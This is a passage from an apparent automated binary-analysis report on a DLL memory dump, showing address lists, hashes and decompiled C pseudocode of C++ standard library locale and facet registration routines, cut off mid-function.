0x6dddf3b5
0x6dddf3b5
0x00000000
0x6dddf3b5
0x6dddf3b3
0x6dddf326
0x6dddf326
0x6dddf329
0x6dddf32d
0x6dddf331
0x6dddf33e
0x6dddf346
0x6dddf348
0x00000000
0x6dddf348
0x6dddf30f
0x6dddf30f
0x00000000
0x6dddf30f
0x6dddf30d
0x6dddf280
0x6dddf280
0x6dddf283
0x6dddf287
0x6dddf28b
0x6dddf298
0x6dddf2a0
0x6dddf2a2
0x00000000
0x6dddf2a2
0x6dddf269
0x6dddf269
0x00000000
0x6dddf269
0x6dddf267
0x6dddf1da
0x6dddf1da
0x6dddf1dd
0x6dddf1e1
0x6dddf1e5
0x6dddf1f2
0x6dddf1fa
0x6dddf1fc
0x00000000
0x6dddf1fc
0x6dddf1c3
0x6dddf1c3
0x00000000
0x6dddf1c3
0x6dddf1c1
0x6dddf134
0x6dddf134
0x6dddf137
0x6dddf13b
0x6dddf13f
0x6dddf14c
0x6dddf154
0x6dddf156
0x00000000
0x6dddf156
0x6dddf11d
0x6dddf11d
0x00000000
0x6dddf11d
0x6dddf11b

APIs

__EH_prolog3.LIBCMT ref: 6DDDF0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF0EE
int.LIBCPMT ref: 6DDDF105

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

ctype.LIBCPMT ref: 6DDDF128
std::_Facet_Register.LIBCPMT ref: 6DDDF13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF17D

Strings

(km, xrefs: 6DDDF0F9

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (km
API String ID: 1394824916-2527675895
Opcode ID: b24a6dc2632e705bfac81400aa66da48277cd40520cfba0e11915d313ca87dda
Instruction ID: 191dba7abbb72576ecd601b09361200ed1ddea008b270fe081a75084b09f103d
Opcode Fuzzy Hash: b24a6dc2632e705bfac81400aa66da48277cd40520cfba0e11915d313ca87dda
Instruction Fuzzy Hash: F211A075908129DBCF01FBA4C850ABEB7B4AF45718F260009F615AB390DF7499058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDA0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t178 =  *0x6de96cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6DDB161C(0x6de96b38);
				_t133 = _a8;
				_t64 = E6DDB171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDA9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t173, _t178, 0x14);
							E6DDD6653( &_v20, 0);
							_t179 =  *0x6de96ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6DDB161C(0x6de96cb8);
							_t140 = _a8;
							_t174 = E6DDB171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t130, _t174, _t179, 0x14);
										E6DDD6653( &_v20, 0);
										_t180 =  *0x6de96cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6DDB161C(0x6de96cbc);
										_t147 = _a8;
										_t175 = E6DDB171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438( &_v32);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t130, _t175, _t180, 0x14);
													E6DDD6653( &_v20, 0);
													_t181 =  *0x6de96cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6DDB161C(0x6de96cc0);
													_t154 = _a8;
													_t176 = E6DDB171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6DDD66BA( &_v20);
														return E6DDF0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6DDDAB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6DDB1438(_t158);
																E6DDF3D74( &_v32, 0x6de93504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6de3ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6DDD6FD3(__eflags, _t176);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6de96cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t175);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6de96cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t174);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6de96ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t173);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6de96cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

0x6ddda0ff
0x6ddda0ff
0x6ddda106
0x6ddda110
0x6ddda115
0x6ddda120
0x6ddda124
0x6ddda127
0x6ddda12c
0x6ddda130
0x6ddda135
0x6ddda139
0x6ddda17e
0x6ddda181
0x6ddda18d
0x6ddda13b
0x6ddda13d
0x6ddda143
0x6ddda149
0x6ddda151
0x6ddda154
0x6ddda191
0x6ddda19f
0x6ddda1a4
0x6ddda1ac
0x6ddda1b6
0x6ddda1bb
0x6ddda1c6
0x6ddda1ca
0x6ddda1cd
0x6ddda1d2
0x6ddda1db
0x6ddda1dd
0x6ddda1df
0x6ddda224
0x6ddda227
0x6ddda233
0x6ddda1e1
0x6ddda1e1
0x6ddda1e3
0x6ddda1e9
0x6ddda1ef
0x6ddda1f7
0x6ddda1fa
0x6ddda237
0x6ddda245
0x6ddda24a
0x6ddda252
0x6ddda25c
0x6ddda261
0x6ddda26c
0x6ddda270
0x6ddda273
0x6ddda278
0x6ddda281
0x6ddda283
0x6ddda285
0x6ddda2ca
0x6ddda2cd
0x6ddda2d9
0x6ddda287
0x6ddda287
0x6ddda289
0x6ddda28f
0x6ddda295
0x6ddda29d
0x6ddda2a0
0x6ddda2dd
0x6ddda2eb
0x6ddda2f0
0x6ddda2f8
0x6ddda302
0x6ddda307
0x6ddda312
0x6ddda316
0x6ddda319
0x6ddda31e
0x6ddda327
0x6ddda329
0x6ddda32b
0x6ddda370
0x6ddda373
0x6ddda37f
0x6ddda32d
0x6ddda32d
0x6ddda32f
0x6ddda335
0x6ddda33b
0x6ddda343
0x6ddda346
0x6ddda380
0x6ddda383
0x6ddda391
0x6ddda396
0x6ddda39a
0x6ddda39e
0x6ddda3a3
0x6ddda3a6
0x6ddda3ad
0x6ddda348
0x6ddda348
0x6ddda34b
0x6ddda34f
0x6ddda353
0x6ddda360
0x6ddda368
0x6ddda36a
0x00000000
0x6ddda36a
0x6ddda331
0x6ddda331
0x00000000
0x6ddda331
0x6ddda32f
0x6ddda2a2
0x6ddda2a2
0x6ddda2a5
0x6ddda2a9
0x6ddda2ad
0x6ddda2ba
0x6ddda2c2
0x6ddda2c4
0x00000000
0x6ddda2c4
0x6ddda28b
0x6ddda28b
0x00000000
0x6ddda28b
0x6ddda289
0x6ddda1fc
0x6ddda1fc
0x6ddda1ff
0x6ddda203
0x6ddda207
0x6ddda214
0x6ddda21c
0x6ddda21e
0x00000000
0x6ddda21e
0x6ddda1e5
0x6ddda1e5
0x00000000
0x6ddda1e5
0x6ddda1e3
0x6ddda156
0x6ddda156
0x6ddda159
0x6ddda15d
0x6ddda161
0x6ddda16e
0x6ddda176
0x6ddda178
0x00000000
0x6ddda178
0x6ddda13f
0x6ddda13f
0x00000000
0x6ddda13f
0x6ddda13d

APIs

__EH_prolog3.LIBCMT ref: 6DDDA106
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA110
int.LIBCPMT ref: 6DDDA127

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

ctype.LIBCPMT ref: 6DDDA14A
std::_Facet_Register.LIBCPMT ref: 6DDDA161
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA181
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA19F

Strings

8km, xrefs: 6DDDA11B

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8km
API String ID: 1394824916-2508146540
Opcode ID: d8f719a977699210efe5a4c3f901df8d780f2b0e519a46383bf5ae422b2dec50
Instruction ID: da27d7a267206f276a88000143b8ebca5613b52e68df2a0c1e3a5d993624db8b
Opcode Fuzzy Hash: d8f719a977699210efe5a4c3f901df8d780f2b0e519a46383bf5ae422b2dec50
Instruction Fuzzy Hash: 0611E071809119DBCF01FBA4C840EBEB7B5AF54318F264009F510AB290DF749A058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF037, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF037(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t293;
				signed int _t294;
				void* _t306;
				void* _t319;
				void* _t332;
				void* _t345;
				void* _t358;
				void* _t371;
				void* _t384;
				void* _t397;
				void* _t410;
				void* _t423;
				void* _t436;
				void* _t449;
				void* _t462;
				void* _t475;
				void* _t488;
				void* _t501;
				void* _t514;
				void* _t527;
				void* _t540;
				signed int _t777;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t853;
				signed int _t854;
				signed int _t855;
				signed int _t856;
				signed int _t857;
				signed int _t858;
				signed int _t859;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				signed int _t877;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				void* _t902;

				_t838 = __edx;
				_t637 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t902 - 0x14, 0);
				_t861 =  *0x6de96db4; // 0x0
				 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
				 *(_t902 - 0x10) = _t861;
				_t293 = E6DDB161C(0x6de96d68);
				_t640 =  *((intOrPtr*)(_t902 + 8));
				_t294 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t293);
				_t840 = _t294;
				if(_t294 != 0) {
					L5:
					E6DDD66BA(_t902 - 0x14);
					return E6DDF0075(_t840);
				} else {
					if(_t861 == 0) {
						_push( *((intOrPtr*)(_t902 + 8)));
						_push(_t902 - 0x10);
						__eflags = E6DDE0DA5(__ebx, _t640, __edx, _t840, _t861) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t902 - 0x20);
							E6DDF3D74(_t902 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t840, _t861, 0x14);
							E6DDD6653(_t902 - 0x14, 0);
							_t862 =  *0x6de96dd4; // 0x0
							 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
							 *(_t902 - 0x10) = _t862;
							_t306 = E6DDB161C(0x6de96b28);
							_t647 =  *((intOrPtr*)(_t902 + 8));
							_t841 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t306);
							__eflags = _t841;
							if(_t841 != 0) {
								L12:
								E6DDD66BA(_t902 - 0x14);
								return E6DDF0075(_t841);
							} else {
								__eflags = _t862;
								if(_t862 == 0) {
									_push( *((intOrPtr*)(_t902 + 8)));
									_push(_t902 - 0x10);
									__eflags = E6DDE0E47(_t637, _t647, __edx, _t841, _t862) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t902 - 0x20);
										E6DDF3D74(_t902 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t637, _t841, _t862, 0x14);
										E6DDD6653(_t902 - 0x14, 0);
										_t863 =  *0x6de96de8; // 0x0
										 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
										 *(_t902 - 0x10) = _t863;
										_t319 = E6DDB161C(0x6de96d94);
										_t654 =  *((intOrPtr*)(_t902 + 8));
										_t842 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t319);
										__eflags = _t842;
										if(_t842 != 0) {
											L19:
											E6DDD66BA(_t902 - 0x14);
											return E6DDF0075(_t842);
										} else {
											__eflags = _t863;
											if(_t863 == 0) {
												_push( *((intOrPtr*)(_t902 + 8)));
												_push(_t902 - 0x10);
												__eflags = E6DDE0EB7(_t637, _t654, __edx, _t842, _t863) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t902 - 0x20);
													E6DDF3D74(_t902 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t637, _t842, _t863, 0x14);
													E6DDD6653(_t902 - 0x14, 0);
													_t864 =  *0x6de96db8; // 0x0
													 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
													 *(_t902 - 0x10) = _t864;
													_t332 = E6DDB161C(0x6de96d6c);
													_t661 =  *((intOrPtr*)(_t902 + 8));
													_t843 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t332);
													__eflags = _t843;
													if(_t843 != 0) {
														L26:
														E6DDD66BA(_t902 - 0x14);
														return E6DDF0075(_t843);
													} else {
														__eflags = _t864;
														if(_t864 == 0) {
															_push( *((intOrPtr*)(_t902 + 8)));
															_push(_t902 - 0x10);
															__eflags = E6DDE0F1F(_t637, _t661, _t838, _t843, _t864) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t902 - 0x20);
																E6DDF3D74(_t902 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t637, _t843, _t864, 0x14);
																E6DDD6653(_t902 - 0x14, 0);
																_t865 =  *0x6de96dec; // 0x0
																 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																 *(_t902 - 0x10) = _t865;
																_t345 = E6DDB161C(0x6de96d98);
																_t668 =  *((intOrPtr*)(_t902 + 8));
																_t844 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t345);
																__eflags = _t844;
																if(_t844 != 0) {
																	L33:
																	E6DDD66BA(_t902 - 0x14);
																	return E6DDF0075(_t844);
																} else {
																	__eflags = _t865;
																	if(_t865 == 0) {
																		_push( *((intOrPtr*)(_t902 + 8)));
																		_push(_t902 - 0x10);
																		__eflags = E6DDE0F87(_t637, _t668, _t838, _t844, _t865) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t902 - 0x20);
																			E6DDF3D74(_t902 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t637, _t844, _t865, 0x14);
																			E6DDD6653(_t902 - 0x14, 0);
																			_t866 =  *0x6de96dbc; // 0x0
																			 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																			 *(_t902 - 0x10) = _t866;
																			_t358 = E6DDB161C(0x6de96d70);
																			_t675 =  *((intOrPtr*)(_t902 + 8));
																			_t845 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t358);
																			__eflags = _t845;
																			if(_t845 != 0) {
																				L40:
																				E6DDD66BA(_t902 - 0x14);
																				return E6DDF0075(_t845);
																			} else {
																				__eflags = _t866;
																				if(_t866 == 0) {
																					_push( *((intOrPtr*)(_t902 + 8)));
																					_push(_t902 - 0x10);
																					__eflags = E6DDE0FEF(_t637, _t675, _t838, _t845, _t866) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t902 - 0x20);
																						E6DDF3D74(_t902 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t637, _t845, _t866, 0x14);
																						E6DDD6653(_t902 - 0x14, 0);
																						_t867 =  *0x6de96df0; // 0x0
																						 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																						 *(_t902 - 0x10) = _t867;
																						_t371 = E6DDB161C(0x6de96d9c);
																						_t682 =  *((intOrPtr*)(_t902 + 8));
																						_t846 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t371);
																						__eflags = _t846;
																						if(_t846 != 0) {
																							L47:
																							E6DDD66BA(_t902 - 0x14);
																							return E6DDF0075(_t846);
																						} else {
																							__eflags = _t867;
																							if(_t867 == 0) {
																								_push( *((intOrPtr*)(_t902 + 8)));
																								_push(_t902 - 0x10);
																								__eflags = E6DDE1057(_t637, _t682, _t838, _t846, _t867) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t902 - 0x20);
																									E6DDF3D74(_t902 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t637, _t846, _t867, 0x14);
																									E6DDD6653(_t902 - 0x14, 0);
																									_t868 =  *0x6de96dc0; // 0x0
																									 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																									 *(_t902 - 0x10) = _t868;
																									_t384 = E6DDB161C(0x6de96d74);
																									_t689 =  *((intOrPtr*)(_t902 + 8));
																									_t847 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t384);
																									__eflags = _t847;
																									if(_t847 != 0) {
																										L54:
																										E6DDD66BA(_t902 - 0x14);
																										return E6DDF0075(_t847);
																									} else {
																										__eflags = _t868;
																										if(_t868 == 0) {
																											_push( *((intOrPtr*)(_t902 + 8)));
																											_push(_t902 - 0x10);
																											__eflags = E6DDE10BF(_t637, _t689, _t838, _t847, _t868) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t902 - 0x20);
																												E6DDF3D74(_t902 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t637, _t847, _t868, 0x14);
																												E6DDD6653(_t902 - 0x14, 0);
																												_t869 =  *0x6de96df8; // 0x0
																												 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																												 *(_t902 - 0x10) = _t869;
																												_t397 = E6DDB161C(0x6de96da4);
																												_t696 =  *((intOrPtr*)(_t902 + 8));
																												_t848 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t397);
																												__eflags = _t848;
																												if(_t848 != 0) {
																													L61:
																													E6DDD66BA(_t902 - 0x14);
																													return E6DDF0075(_t848);
																												} else {
																													__eflags = _t869;
																													if(_t869 == 0) {
																														_push( *((intOrPtr*)(_t902 + 8)));
																														_push(_t902 - 0x10);
																														__eflags = E6DDE1127(_t637, _t696, _t838, _t848, _t869) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t902 - 0x20);
																															E6DDF3D74(_t902 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t637, _t848, _t869, 0x14);
																															E6DDD6653(_t902 - 0x14, 0);
																															_t870 =  *0x6de96df4; // 0x0
																															 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																															 *(_t902 - 0x10) = _t870;
																															_t410 = E6DDB161C(0x6de96da0);
																															_t703 =  *((intOrPtr*)(_t902 + 8));
																															_t849 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t410);
																															__eflags = _t849;
																															if(_t849 != 0) {
																																L68:
																																E6DDD66BA(_t902 - 0x14);
																																return E6DDF0075(_t849);
																															} else {
																																__eflags = _t870;
																																if(_t870 == 0) {
																																	_push( *((intOrPtr*)(_t902 + 8)));
																																	_push(_t902 - 0x10);
																																	__eflags = E6DDE11AB(_t637, _t703, _t838, _t849, _t870) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t902 - 0x20);
																																		E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t637, _t849, _t870, 0x14);
																																		E6DDD6653(_t902 - 0x14, 0);
																																		_t871 =  *0x6de96dc8; // 0x0
																																		 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																		 *(_t902 - 0x10) = _t871;
																																		_t423 = E6DDB161C(0x6de96d7c);
																																		_t710 =  *((intOrPtr*)(_t902 + 8));
																																		_t850 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t423);
																																		__eflags = _t850;
																																		if(_t850 != 0) {
																																			L75:
																																			E6DDD66BA(_t902 - 0x14);
																																			return E6DDF0075(_t850);
																																		} else {
																																			__eflags = _t871;
																																			if(_t871 == 0) {
																																				_push( *((intOrPtr*)(_t902 + 8)));
																																				_push(_t902 - 0x10);
																																				__eflags = E6DDE1230(_t637, _t710, _t838, _t850, _t871) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t902 - 0x20);
																																					E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t637, _t850, _t871, 0x14);
																																					E6DDD6653(_t902 - 0x14, 0);
																																					_t872 =  *0x6de96dc4; // 0x0
																																					 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																					 *(_t902 - 0x10) = _t872;
																																					_t436 = E6DDB161C(0x6de96d78);
																																					_t717 =  *((intOrPtr*)(_t902 + 8));
																																					_t851 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t436);
																																					__eflags = _t851;
																																					if(_t851 != 0) {
																																						L82:
																																						E6DDD66BA(_t902 - 0x14);
																																						return E6DDF0075(_t851);
																																					} else {
																																						__eflags = _t872;
																																						if(_t872 == 0) {
																																							_push( *((intOrPtr*)(_t902 + 8)));
																																							_push(_t902 - 0x10);
																																							__eflags = E6DDE12B4(_t637, _t717, _t838, _t851, _t872) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t902 - 0x20);
																																								E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t637, _t851, _t872, 0x14);
																																								E6DDD6653(_t902 - 0x14, 0);
																																								_t873 =  *0x6de96dd8; // 0x0
																																								 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																								 *(_t902 - 0x10) = _t873;
																																								_t449 = E6DDB161C(0x6de96d84);
																																								_t724 =  *((intOrPtr*)(_t902 + 8));
																																								_t852 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t449);
																																								__eflags = _t852;
																																								if(_t852 != 0) {
																																									L89:
																																									E6DDD66BA(_t902 - 0x14);
																																									return E6DDF0075(_t852);
																																								} else {
																																									__eflags = _t873;
																																									if(_t873 == 0) {
																																										_push( *((intOrPtr*)(_t902 + 8)));
																																										_push(_t902 - 0x10);
																																										__eflags = E6DDE1339(_t637, _t724, _t838, _t852, _t873) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t902 - 0x20);
																																											E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t637, _t852, _t873, 0x14);
																																											E6DDD6653(_t902 - 0x14, 0);
																																											_t874 =  *0x6de96db0; // 0x0
																																											 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																											 *(_t902 - 0x10) = _t874;
																																											_t462 = E6DDB161C(0x6de96d64);
																																											_t731 =  *((intOrPtr*)(_t902 + 8));
																																											_t853 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t462);
																																											__eflags = _t853;
																																											if(_t853 != 0) {
																																												L96:
																																												E6DDD66BA(_t902 - 0x14);
																																												return E6DDF0075(_t853);
																																											} else {
																																												__eflags = _t874;
																																												if(_t874 == 0) {
																																													_push( *((intOrPtr*)(_t902 + 8)));
																																													_push(_t902 - 0x10);
																																													__eflags = E6DDE13A1(_t637, _t731, _t838, _t853, _t874) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t902 - 0x20);
																																														E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t637, _t853, _t874, 0x14);
																																														E6DDD6653(_t902 - 0x14, 0);
																																														_t875 =  *0x6de96ddc; // 0x0
																																														 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																														 *(_t902 - 0x10) = _t875;
																																														_t475 = E6DDB161C(0x6de96d88);
																																														_t738 =  *((intOrPtr*)(_t902 + 8));
																																														_t854 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t475);
																																														__eflags = _t854;
																																														if(_t854 != 0) {
																																															L103:
																																															E6DDD66BA(_t902 - 0x14);
																																															return E6DDF0075(_t854);
																																														} else {
																																															__eflags = _t875;
																																															if(_t875 == 0) {
																																																_push( *((intOrPtr*)(_t902 + 8)));
																																																_push(_t902 - 0x10);
																																																__eflags = E6DDE1409(_t637, _t738, _t838, _t854, _t875) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t902 - 0x20);
																																																	E6DDF3D74(_t902 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t637, _t854, _t875, 0x14);
																																																	E6DDD6653(_t902 - 0x14, 0);
																																																	_t876 =  *0x6de96de0; // 0x0
																																																	 *(_t902 - 4) =  *(_t902 - 4) & 0x00000000;
																																																	 *(_t902 - 0x10) = _t876;
																																																	_t488 = E6DDB161C(0x6de96d8c);
																																																	_t745 =  *((intOrPtr*)(_t902 + 8));
																																																	_t855 = E6DDB171B( *((intOrPtr*)(_t902 + 8)), _t488);
																																																	__eflags = _t855;
																																																	if(_t855 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t902 - 0x14);
																																																		return E6DDF0075(_t855);
																																																	} else {
																																																		__eflags = _t876;
																																																		if(_t876 == 0) {
																																																			_push( *((intOrPtr*)(_t902 + 8)));
																																																			_push(_t902 - 0x10);
																																																			__eflags = E6DDE1471(_t637, _t745, _t838, _t855, _t876) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t902 - 0x20);
